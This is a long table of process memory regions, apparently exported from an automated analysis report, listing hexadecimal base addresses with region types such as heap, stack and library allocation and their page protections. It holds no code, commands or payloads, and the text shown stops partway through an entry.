|
||
270D2182000
|
heap
|
page read and write
|
||
266F36AA000
|
heap
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
281FC2F2000
|
heap
|
page read and write
|
||
7FFB0B875000
|
unkown
|
page execute and read and write
|
||
270D2259000
|
heap
|
page read and write
|
||
1AB5E2A5000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1FC22D23000
|
heap
|
page read and write
|
||
1E181CF7000
|
heap
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1F52B8CB000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
1C550095000
|
heap
|
page read and write
|
||
25D4E340000
|
heap
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
1700B890000
|
heap
|
page read and write
|
||
1FC25601000
|
heap
|
page read and write
|
||
270D2267000
|
heap
|
page read and write
|
||
1C5500A3000
|
heap
|
page read and write
|
||
1DEE7C8C000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
13C87980000
|
heap
|
page read and write
|
||
281FC51E000
|
heap
|
page read and write
|
||
270D245D000
|
heap
|
page read and write
|
||
1FC2531D000
|
heap
|
page read and write
|
||
1CEF3F75000
|
heap
|
page read and write
|
||
23AC6111000
|
heap
|
page read and write
|
||
2484A7EC000
|
heap
|
page read and write
|
||
2484A152000
|
heap
|
page read and write
|
||
202E5710000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
270D2222000
|
heap
|
page read and write
|
||
23195FB0000
|
heap
|
page read and write
|
||
266F3097000
|
heap
|
page read and write
|
||
579A987000
|
stack
|
page read and write
|
||
1CEF2092000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1E8E41C0000
|
heap
|
page read and write
|
||
281FC3FB000
|
heap
|
page read and write
|
||
1C5500B0000
|
heap
|
page read and write
|
||
2090A8F0000
|
heap
|
page read and write
|
||
8F1C0CB000
|
stack
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1CEF20BE000
|
heap
|
page read and write
|
||
1F52B8C0000
|
heap
|
page read and write
|
||
130ECFF000
|
stack
|
page read and write
|
||
7FFB1BB2E000
|
unkown
|
page read and write
|
||
76BB6F6000
|
stack
|
page read and write
|
||
1FC255AE000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
1E0E1593000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
1FC25BE8000
|
direct allocation
|
page read and write
|
||
1C550150000
|
trusted library allocation
|
page read and write
|
||
23AC5B56000
|
heap
|
page read and write
|
||
1E0D9920000
|
direct allocation
|
page read and write
|
||
1FC25635000
|
heap
|
page read and write
|
||
1FC26500000
|
heap
|
page read and write
|
||
1DEE7C30000
|
heap
|
page read and write
|
||
1FC24F55000
|
heap
|
page read and write
|
||
23AC5AFE000
|
heap
|
page read and write
|
||
1C5500AB000
|
heap
|
page read and write
|
||
1E8E34F9000
|
trusted library allocation
|
page read and write
|
||
51D544E000
|
stack
|
page read and write
|
||
23AC6129000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
1FC251C9000
|
heap
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
1FC25FC7000
|
heap
|
page read and write
|
||
2484C18D000
|
heap
|
page read and write
|
||
7FFB1AB12000
|
unkown
|
page execute and read and write
|
||
2484C183000
|
heap
|
page read and write
|
||
17FCF062000
|
heap
|
page read and write
|
||
9F33AFC000
|
stack
|
page read and write
|
||
1CEF1FB0000
|
trusted library allocation
|
page read and write
|
||
267C1C10000
|
heap
|
page read and write
|
||
1DEE7C87000
|
heap
|
page read and write
|
||
1AB5E2A3000
|
heap
|
page read and write
|
||
23AC60F7000
|
heap
|
page read and write
|
||
92C187F000
|
stack
|
page read and write
|
||
239E4918000
|
heap
|
page read and write
|
||
1E0D7EA7000
|
direct allocation
|
page read and write
|
||
1E8E4047000
|
heap
|
page read and write
|
||
267AA62B000
|
trusted library allocation
|
page read and write
|
||
281FC331000
|
heap
|
page read and write
|
||
1E4CF9EB000
|
heap
|
page read and write
|
||
4B74BCC000
|
stack
|
page read and write
|
||
281FC350000
|
heap
|
page read and write
|
||
1FC2531F000
|
heap
|
page read and write
|
||
20C72DA9000
|
heap
|
page read and write
|
||
1FC25692000
|
heap
|
page read and write
|
||
2584DBF5000
|
heap
|
page read and write
|
||
1FC255B2000
|
heap
|
page read and write
|
||
79002FE000
|
unkown
|
page read and write
|
||
281FC331000
|
heap
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
1FC255E0000
|
heap
|
page read and write
|
||
281FC3FB000
|
heap
|
page read and write
|
||
2364087B000
|
heap
|
page read and write
|
||
7FFB1C3C6000
|
unkown
|
page read and write
|
||
1AB5E272000
|
heap
|
page read and write
|
||
1B3A8248000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1E0E15B6000
|
heap
|
page read and write
|
||
1FC2561E000
|
heap
|
page read and write
|
||
2484A15E000
|
heap
|
page read and write
|
||
2322B430000
|
heap
|
page read and write
|
||
1CE588D0000
|
heap
|
page read and write
|
||
1E0D64D8000
|
heap
|
page read and write
|
||
7FFB0BFE8000
|
unkown
|
page read and write
|
||
267A76F0000
|
trusted library section
|
page read and write
|
||
2484A7F9000
|
heap
|
page read and write
|
||
7FFAA9353000
|
trusted library allocation
|
page execute and read and write
|
||
1CB96E10000
|
heap
|
page read and write
|
||
270D227C000
|
heap
|
page read and write
|
||
23AC60F3000
|
heap
|
page read and write
|
||
1909D570000
|
heap
|
page read and write
|
||
87C027E000
|
stack
|
page read and write
|
||
281FC33A000
|
heap
|
page read and write
|
||
19DD4E90000
|
heap
|
page read and write
|
||
6C084DC000
|
stack
|
page read and write
|
||
C602EFC000
|
stack
|
page read and write
|
||
23097C90000
|
heap
|
page read and write
|
||
135F05F9000
|
heap
|
page read and write
|
||
281FC3FB000
|
heap
|
page read and write
|
||
2090A7D0000
|
heap
|
page read and write
|
||
1CEF2687000
|
heap
|
page read and write
|
||
19BC66D0000
|
heap
|
page read and write
|
||
266F3030000
|
heap
|
page read and write
|
||
1E0E15F1000
|
heap
|
page read and write
|
||
7FF6DC701000
|
unkown
|
page execute read
|
||
21B1C064000
|
heap
|
page read and write
|
||
23097D38000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
7FFAA9440000
|
trusted library allocation
|
page execute and read and write
|
||
1E8E402B000
|
heap
|
page read and write
|
||
1FC22D75000
|
heap
|
page read and write
|
||
1DD0E0AE000
|
heap
|
page read and write
|
||
1FC2526D000
|
heap
|
page read and write
|
||
F516AFC000
|
stack
|
page read and write
|
||
2484A17D000
|
heap
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
1E5FA9A0000
|
heap
|
page read and write
|
||
1E0E1601000
|
heap
|
page read and write
|
||
81CDEFE000
|
stack
|
page read and write
|
||
270D27D9000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
239E8428000
|
trusted library allocation
|
page read and write
|
||
1690F75F000
|
heap
|
page read and write
|
||
270D218E000
|
heap
|
page read and write
|
||
23DC3E5B000
|
heap
|
page read and write
|
||
24B86A40000
|
heap
|
page read and write
|
||
601B2FF000
|
unkown
|
page read and write
|
||
239E48BB000
|
heap
|
page read and write
|
||
1E0E15E5000
|
heap
|
page read and write
|
||
267A9111000
|
trusted library allocation
|
page read and write
|
||
5C55FF000
|
unkown
|
page read and write
|
||
C063BFF000
|
unkown
|
page read and write
|
||
1E182094000
|
heap
|
page read and write
|
||
266F3085000
|
heap
|
page read and write
|
||
1FC25361000
|
heap
|
page read and write
|
||
7FFB0D720000
|
unkown
|
page readonly
|
||
1E0D7FB4000
|
heap
|
page read and write
|
||
1DD0C80E000
|
heap
|
page read and write
|
||
281FC512000
|
heap
|
page read and write
|
||
1FC25569000
|
heap
|
page read and write
|
||
1FC24F48000
|
heap
|
page read and write
|
||
73D267F000
|
stack
|
page read and write
|
||
23AC79F4000
|
heap
|
page read and write
|
||
E6C139F000
|
stack
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1AD18B10000
|
heap
|
page read and write
|
||
20D43B0B000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
270D27B8000
|
heap
|
page read and write
|
||
28425E62000
|
heap
|
page read and write
|
||
1FC24B30000
|
direct allocation
|
page read and write
|
||
266F3047000
|
heap
|
page read and write
|
||
2484A7FC000
|
heap
|
page read and write
|
||
1C550784000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
25D4E110000
|
heap
|
page read and write
|
||
1FC255E0000
|
heap
|
page read and write
|
||
1FC25AA0000
|
direct allocation
|
page read and write
|
||
23AC5B4E000
|
heap
|
page read and write
|
||
7FFB1C266000
|
unkown
|
page execute and write copy
|
||
281FC3FB000
|
heap
|
page read and write
|
||
28425E48000
|
heap
|
page read and write
|
||
1E7B5F7B000
|
heap
|
page read and write
|
||
266F3091000
|
heap
|
page read and write
|
||
1FC252EB000
|
heap
|
page read and write
|
||
7FFAA9670000
|
trusted library allocation
|
page read and write
|
||
1407C900000
|
heap
|
page read and write
|
||
1E4CFC80000
|
heap
|
page read and write
|
||
2BA38E54000
|
heap
|
page read and write
|
||
19DD4EFA000
|
heap
|
page read and write
|
||
270D4054000
|
heap
|
page read and write
|
||
1E0E1628000
|
heap
|
page read and write
|
||
1700B7F0000
|
heap
|
page read and write
|
||
2090A7F8000
|
heap
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
1E0E160D000
|
heap
|
page read and write
|
||
20D43ADB000
|
heap
|
page read and write
|
||
1E8E4052000
|
heap
|
page read and write
|
||
19DD5154000
|
heap
|
page read and write
|
||
267A7904000
|
heap
|
page read and write
|
||
1407BA15000
|
heap
|
page read and write
|
||
1FC255FA000
|
heap
|
page read and write
|
||
267A76C0000
|
heap
|
page read and write
|
||
1FC24F2D000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
1407C780000
|
trusted library allocation
|
page read and write
|
||
1FC25646000
|
heap
|
page read and write
|
||
1C552013000
|
heap
|
page read and write
|
||
D5946FF000
|
stack
|
page read and write
|
||
17FCEFB0000
|
heap
|
page read and write
|
||
23195FD2000
|
heap
|
page read and write
|
||
266F3085000
|
heap
|
page read and write
|
||
76F4EFF000
|
unkown
|
page read and write
|
||
15762F7000
|
stack
|
page read and write
|
||
1FC25742000
|
heap
|
page read and write
|
||
1FC251A9000
|
heap
|
page read and write
|
||
1FC22D1B000
|
heap
|
page read and write
|
||
22972D00000
|
heap
|
page read and write
|
||
1FC25564000
|
heap
|
page read and write
|
||
7FFB0C613000
|
unkown
|
page read and write
|
||
E6C177E000
|
stack
|
page read and write
|
||
1690F74E000
|
heap
|
page read and write
|
||
19BC6794000
|
heap
|
page read and write
|
||
239E6410000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
D213DBF000
|
stack
|
page read and write
|
||
E6C16FE000
|
stack
|
page read and write
|
||
1E0D9A40000
|
direct allocation
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
281FE2F0000
|
heap
|
page read and write
|
||
267A78E0000
|
heap
|
page execute and read and write
|
||
1FC252EE000
|
heap
|
page read and write
|
||
1FC22D12000
|
heap
|
page read and write
|
||
2BA38AE0000
|
heap
|
page read and write
|
||
1EA2312C000
|
heap
|
page read and write
|
||
1576F7E000
|
stack
|
page read and write
|
||
2BA38B21000
|
heap
|
page read and write
|
||
1E0E1570000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1E4CF9F8000
|
heap
|
page read and write
|
||
1407C800000
|
heap
|
page read and write
|
||
1FC256C6000
|
heap
|
page read and write
|
||
1E181C20000
|
heap
|
page read and write
|
||
25D4E150000
|
heap
|
page read and write
|
||
1FC255BF000
|
heap
|
page read and write
|
||
28425E5F000
|
heap
|
page read and write
|
||
1FC2555E000
|
heap
|
page read and write
|
||
601AF8C000
|
stack
|
page read and write
|
||
15780FE000
|
unkown
|
page readonly
|
||
B2B89FF000
|
stack
|
page read and write
|
||
27E84CB0000
|
heap
|
page read and write
|
||
202E576A000
|
heap
|
page read and write
|
||
7FFAA9466000
|
trusted library allocation
|
page execute and read and write
|
||
78FFF5B000
|
stack
|
page read and write
|
||
1DD0FB1B000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1FC25698000
|
heap
|
page read and write
|
||
1E0D9BAD000
|
direct allocation
|
page read and write
|
||
1FC2533D000
|
heap
|
page read and write
|
||
1FC253A3000
|
heap
|
page read and write
|
||
270D227C000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
1C550150000
|
trusted library allocation
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
267A7719000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
73D23C8000
|
stack
|
page read and write
|
||
157717E000
|
stack
|
page read and write
|
||
20C72D90000
|
heap
|
page read and write
|
||
7FFB0B811000
|
unkown
|
page execute and read and write
|
||
1407B28F000
|
heap
|
page read and write
|
||
1DD0C804000
|
heap
|
page read and write
|
||
1690F75B000
|
heap
|
page read and write
|
||
23DC4020000
|
heap
|
page read and write
|
||
1CEF3F71000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1FC25C34000
|
direct allocation
|
page read and write
|
||
81D277E000
|
stack
|
page read and write
|
||
19BC650B000
|
heap
|
page read and write
|
||
1407CAF0000
|
remote allocation
|
page read and write
|
||
1FC255B2000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1DD0FAE0000
|
heap
|
page read and write
|
||
1E0D9AD6000
|
direct allocation
|
page read and write
|
||
1FC25656000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
23AC6115000
|
heap
|
page read and write
|
||
22972EC2000
|
heap
|
page read and write
|
||
8F1C14F000
|
stack
|
page read and write
|
||
1DD0C80E000
|
heap
|
page read and write
|
||
1FC22D86000
|
heap
|
page read and write
|
||
1FC25680000
|
heap
|
page read and write
|
||
24B86A60000
|
heap
|
page read and write
|
||
1CEF20A6000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
1FC255B2000
|
heap
|
page read and write
|
||
1E0E15D0000
|
heap
|
page read and write
|
||
1E4CF900000
|
heap
|
page read and write
|
||
1AB5E0D0000
|
heap
|
page read and write
|
||
1E0E1628000
|
heap
|
page read and write
|
||
1FC22CAD000
|
heap
|
page read and write
|
||
1C550130000
|
heap
|
page read and write
|
||
1E0E15FF000
|
heap
|
page read and write
|
||
1DD0C739000
|
heap
|
page read and write
|
||
1E5FA782000
|
heap
|
page read and write
|
||
1E0E15D0000
|
heap
|
page read and write
|
||
245455D0000
|
heap
|
page read and write
|
||
2940C1A0000
|
heap
|
page read and write
|
||
2484A809000
|
heap
|
page read and write
|
||
1DEE7CB2000
|
heap
|
page read and write
|
||
1690F74D000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
76BB679000
|
stack
|
page read and write
|
||
1407C8EF000
|
heap
|
page read and write
|
||
2484A173000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
1E0D64AF000
|
heap
|
page read and write
|
||
1DCE3060000
|
heap
|
page read and write
|
||
20D43AA0000
|
heap
|
page read and write
|
||
24545613000
|
heap
|
page read and write
|
||
2484A7D8000
|
heap
|
page read and write
|
||
23AC5B41000
|
heap
|
page read and write
|
||
1E8E402B000
|
heap
|
page read and write
|
||
7FFB0D721000
|
unkown
|
page execute read
|
||
281FC54B000
|
heap
|
page read and write
|
||
1E0D9B12000
|
direct allocation
|
page read and write
|
||
23AC5B52000
|
heap
|
page read and write
|
||
1E7B5ED0000
|
heap
|
page read and write
|
||
25D4E17A000
|
heap
|
page read and write
|
||
266F3000000
|
heap
|
page read and write
|
||
267C15D3000
|
heap
|
page read and write
|
||
1DD0F9F0000
|
heap
|
page read and write
|
||
23AC6113000
|
heap
|
page read and write
|
||
1FC26019000
|
heap
|
page read and write
|
||
266F3085000
|
heap
|
page read and write
|
||
7E7A77E000
|
stack
|
page read and write
|
||
1FC255D0000
|
heap
|
page read and write
|
||
244EE0CB000
|
heap
|
page read and write
|
||
2322B430000
|
heap
|
page read and write
|
||
1407C6C0000
|
trusted library allocation
|
page read and write
|
||
2484A452000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
19BC67A0000
|
heap
|
page read and write
|
||
1E0E15F1000
|
heap
|
page read and write
|
||
281FC343000
|
heap
|
page read and write
|
||
1407C81F000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1DEE7CAC000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
1FC251B0000
|
heap
|
page read and write
|
||
272B4FF000
|
stack
|
page read and write
|
||
1FC24F4F000
|
heap
|
page read and write
|
||
1A2CE3C7000
|
heap
|
page read and write
|
||
135F0590000
|
heap
|
page read and write
|
||
7DF448CA0000
|
trusted library allocation
|
page execute and read and write
|
||
8F79C7E000
|
stack
|
page read and write
|
||
1E8E3510000
|
trusted library allocation
|
page read and write
|
||
7FFB1C267000
|
unkown
|
page read and write
|
||
C0386FC000
|
stack
|
page read and write
|
||
2637A160000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
1FC25BB0000
|
direct allocation
|
page read and write
|
||
239F6A52000
|
trusted library allocation
|
page read and write
|
||
1690F75B000
|
heap
|
page read and write
|
||
272B3FF000
|
unkown
|
page read and write
|
||
270D2184000
|
heap
|
page read and write
|
||
1DEE7C99000
|
heap
|
page read and write
|
||
1CE58910000
|
heap
|
page read and write
|
||
267C16E0000
|
trusted library allocation
|
page read and write
|
||
23AC5B36000
|
heap
|
page read and write
|
||
27E84FF0000
|
heap
|
page read and write
|
||
1FC255A5000
|
heap
|
page read and write
|
||
23195FD2000
|
heap
|
page read and write
|
||
20D43AF8000
|
heap
|
page read and write
|
||
8F1C57E000
|
stack
|
page read and write
|
||
1FC2566E000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
2B526740000
|
heap
|
page read and write
|
||
1FC25441000
|
heap
|
page read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
23DC40E4000
|
heap
|
page read and write
|
||
8F951FF000
|
unkown
|
page read and write
|
||
1E0E30A0000
|
heap
|
page read and write
|
||
270D224A000
|
heap
|
page read and write
|
||
7FFAA95F0000
|
trusted library allocation
|
page read and write
|
||
1C5500A1000
|
heap
|
page read and write
|
||
2584DC00000
|
heap
|
page read and write
|
||
281FC31F000
|
heap
|
page read and write
|
||
15C999D0000
|
heap
|
page read and write
|
||
270D2190000
|
heap
|
page read and write
|
||
20C72CB0000
|
heap
|
page read and write
|
||
7FFAA9620000
|
trusted library allocation
|
page read and write
|
||
7FFAA9562000
|
trusted library allocation
|
page read and write
|
||
239E4850000
|
heap
|
page read and write
|
||
28425D40000
|
heap
|
page read and write
|
||
157767E000
|
unkown
|
page readonly
|
||
20D43AD5000
|
heap
|
page read and write
|
||
1FC24E8D000
|
heap
|
page read and write
|
||
25D4E170000
|
heap
|
page read and write
|
||
1C552012000
|
heap
|
page read and write
|
||
1FC22D6A000
|
heap
|
page read and write
|
||
1FC25685000
|
heap
|
page read and write
|
||
29AC2440000
|
heap
|
page read and write
|
||
2584DBC0000
|
heap
|
page read and write
|
||
270D2266000
|
heap
|
page read and write
|
||
24BA38B0000
|
heap
|
page read and write
|
||
2484A45B000
|
heap
|
page read and write
|
||
7FFB0B7A3000
|
unkown
|
page execute and read and write
|
||
1576BFE000
|
unkown
|
page readonly
|
||
7FFB1AB00000
|
unkown
|
page readonly
|
||
2090A6F0000
|
heap
|
page read and write
|
||
26395B90000
|
heap
|
page read and write
|
||
1CB96E29000
|
heap
|
page read and write
|
||
51D47FA000
|
stack
|
page read and write
|
||
270D2232000
|
heap
|
page read and write
|
||
1FC24F56000
|
heap
|
page read and write
|
||
1FC256B8000
|
heap
|
page read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
1DD10600000
|
heap
|
page read and write
|
||
267AAF34000
|
trusted library allocation
|
page read and write
|
||
1FC252E8000
|
heap
|
page read and write
|
||
1E8E403F000
|
heap
|
page read and write
|
||
1407C6A1000
|
trusted library allocation
|
page read and write
|
||
1FC25564000
|
heap
|
page read and write
|
||
2484A457000
|
heap
|
page read and write
|
||
1407C8E5000
|
heap
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1FC256B8000
|
heap
|
page read and write
|
||
1FC256CC000
|
heap
|
page read and write
|
||
1E8E3530000
|
heap
|
page read and write
|
||
17FCF062000
|
heap
|
page read and write
|
||
7FFB0C5E3000
|
unkown
|
page execute and read and write
|
||
1FC24F69000
|
heap
|
page read and write
|
||
1FC25558000
|
heap
|
page read and write
|
||
51D54CD000
|
stack
|
page read and write
|
||
1FC255A7000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
28425E5D000
|
heap
|
page read and write
|
||
1FC25F88000
|
heap
|
page read and write
|
||
1FC24E8C000
|
heap
|
page read and write
|
||
1AB5E1B0000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1E4CFA1B000
|
heap
|
page read and write
|
||
1FC2559D000
|
heap
|
page read and write
|
||
1FC22C80000
|
heap
|
page read and write
|
||
239E6292000
|
heap
|
page read and write
|
||
1E0E1520000
|
trusted library allocation
|
page read and write
|
||
1E7B5F91000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
7FF74EF04000
|
unkown
|
page read and write
|
||
26395D60000
|
heap
|
page read and write
|
||
1CEF3F85000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1DD0C710000
|
heap
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
7FFB0BE98000
|
unkown
|
page execute and read and write
|
||
2DE1CC21000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
20D43B00000
|
heap
|
page read and write
|
||
236407B0000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
1EA24C25000
|
heap
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
270D223D000
|
heap
|
page read and write
|
||
1E0D64DA000
|
heap
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
7FFB0BFA9000
|
unkown
|
page execute and read and write
|
||
1E5FA782000
|
heap
|
page read and write
|
||
1E0E1615000
|
heap
|
page read and write
|
||
1E5FA990000
|
heap
|
page read and write
|
||
1FC25635000
|
heap
|
page read and write
|
||
1AB5E282000
|
heap
|
page read and write
|
||
E45F8C000
|
stack
|
page read and write
|
||
1DEE7E30000
|
heap
|
page read and write
|
||
1E8E3FFA000
|
heap
|
page read and write
|
||
1E0D9B10000
|
direct allocation
|
page read and write
|
||
267A7820000
|
trusted library allocation
|
page read and write
|
||
1C55076A000
|
heap
|
page read and write
|
||
239F6A60000
|
trusted library allocation
|
page read and write
|
||
22972DE0000
|
heap
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
270D2222000
|
heap
|
page read and write
|
||
2C25EF19000
|
heap
|
page read and write
|
||
1E8E41DA000
|
heap
|
page read and write
|
||
1FC255E0000
|
heap
|
page read and write
|
||
A42D5FF000
|
stack
|
page read and write
|
||
2484A48D000
|
heap
|
page read and write
|
||
1CEF207C000
|
heap
|
page read and write
|
||
239FE9E0000
|
heap
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
1407BB02000
|
heap
|
page read and write
|
||
2484A173000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
1CE588B0000
|
heap
|
page read and write
|
||
1DD0C792000
|
heap
|
page read and write
|
||
1E8E404A000
|
heap
|
page read and write
|
||
1C290FF000
|
stack
|
page read and write
|
||
281FC3F3000
|
heap
|
page read and write
|
||
1FC26126000
|
heap
|
page read and write
|
||
1E0D9AA0000
|
direct allocation
|
page read and write
|
||
2484A16C000
|
heap
|
page read and write
|
||
1C5507A2000
|
heap
|
page read and write
|
||
7FFAA9370000
|
trusted library allocation
|
page read and write
|
||
51D41BF000
|
stack
|
page read and write
|
||
1DD0F5B0000
|
heap
|
page read and write
|
||
7FFB0D745000
|
unkown
|
page readonly
|
||
267A7660000
|
heap
|
page read and write
|
||
1407C8B0000
|
trusted library allocation
|
page read and write
|
||
1FC2538D000
|
heap
|
page read and write
|
||
267A9E52000
|
trusted library allocation
|
page read and write
|
||
23AC5B68000
|
heap
|
page read and write
|
||
267C1923000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
7FFAA9510000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAA95B0000
|
trusted library allocation
|
page read and write
|
||
51C2DFF000
|
stack
|
page read and write
|
||
1FC25646000
|
heap
|
page read and write
|
||
23AC5B57000
|
heap
|
page read and write
|
||
1DD0C670000
|
heap
|
page read and write
|
||
1CEF2087000
|
heap
|
page read and write
|
||
19DD4D90000
|
heap
|
page read and write
|
||
1FC22D21000
|
heap
|
page read and write
|
||
1E0E1615000
|
heap
|
page read and write
|
||
7FFAA9352000
|
trusted library allocation
|
page read and write
|
||
2584DAD7000
|
heap
|
page read and write
|
||
2322B3B0000
|
heap
|
page read and write
|
||
1CEF20BE000
|
heap
|
page read and write
|
||
1DD0FAE0000
|
heap
|
page read and write
|
||
1DCE30F2000
|
heap
|
page read and write
|
||
28425E68000
|
heap
|
page read and write
|
||
267C168F000
|
heap
|
page read and write
|
||
F516BFF000
|
unkown
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
1E0E30AD000
|
heap
|
page read and write
|
||
1700BB50000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
270D21D9000
|
heap
|
page read and write
|
||
239FE85E000
|
heap
|
page read and write
|
||
266F3020000
|
trusted library allocation
|
page read and write
|
||
236425B0000
|
heap
|
page read and write
|
||
B08A9FF000
|
stack
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
2484A15B000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
7FFB18B82000
|
unkown
|
page execute and write copy
|
||
1FC22D1B000
|
heap
|
page read and write
|
||
CDBD9FD000
|
stack
|
page read and write
|
||
1FC2531F000
|
heap
|
page read and write
|
||
1FC255B0000
|
heap
|
page read and write
|
||
1B3A8250000
|
heap
|
page read and write
|
||
1FC25E2D000
|
heap
|
page read and write
|
||
2940C280000
|
heap
|
page read and write
|
||
1E8E3501000
|
trusted library allocation
|
page read and write
|
||
267C1140000
|
trusted library allocation
|
page read and write
|
||
1FC25556000
|
heap
|
page read and write
|
||
270D27CC000
|
heap
|
page read and write
|
||
19DD5150000
|
heap
|
page read and write
|
||
1C550785000
|
heap
|
page read and write
|
||
1FC24F6A000
|
heap
|
page read and write
|
||
281FC2E9000
|
heap
|
page read and write
|
||
2484C194000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
1407C890000
|
heap
|
page read and write
|
||
1E0E2FA7000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
23DC3E72000
|
heap
|
page read and write
|
||
1FC25550000
|
heap
|
page read and write
|
||
1E0D9A00000
|
direct allocation
|
page read and write
|
||
267C1919000
|
heap
|
page read and write
|
||
1C550799000
|
heap
|
page read and write
|
||
1FC22D49000
|
heap
|
page read and write
|
||
270D404D000
|
heap
|
page read and write
|
||
C063CFF000
|
stack
|
page read and write
|
||
1E0E15F0000
|
heap
|
page read and write
|
||
1FC2532D000
|
heap
|
page read and write
|
||
1B3A8370000
|
heap
|
page read and write
|
||
2484A455000
|
heap
|
page read and write
|
||
27E84C90000
|
heap
|
page read and write
|
||
D6E7AFF000
|
stack
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
270D27A8000
|
heap
|
page read and write
|
||
281FC40C000
|
heap
|
page read and write
|
||
1E0E15AE000
|
heap
|
page read and write
|
||
1407B22B000
|
heap
|
page read and write
|
||
1C55076E000
|
heap
|
page read and write
|
||
7FF74EEFA000
|
unkown
|
page read and write
|
||
C602FFF000
|
unkown
|
page read and write
|
||
7FFB18B81000
|
unkown
|
page execute and read and write
|
||
23AC6129000
|
heap
|
page read and write
|
||
245455F2000
|
heap
|
page read and write
|
||
2484A2D0000
|
trusted library allocation
|
page read and write
|
||
23098014000
|
heap
|
page read and write
|
||
239FE8D6000
|
heap
|
page execute and read and write
|
||
1E8E34F9000
|
trusted library allocation
|
page read and write
|
||
281FC35D000
|
heap
|
page read and write
|
||
1B3A823B000
|
heap
|
page read and write
|
||
1CE58904000
|
heap
|
page read and write
|
||
1CEF3F85000
|
heap
|
page read and write
|
||
4C53D7E000
|
stack
|
page read and write
|
||
266F30A8000
|
heap
|
page read and write
|
||
23AC5B28000
|
heap
|
page read and write
|
||
267C1608000
|
heap
|
page read and write
|
||
29AC2340000
|
heap
|
page read and write
|
||
1C5507A9000
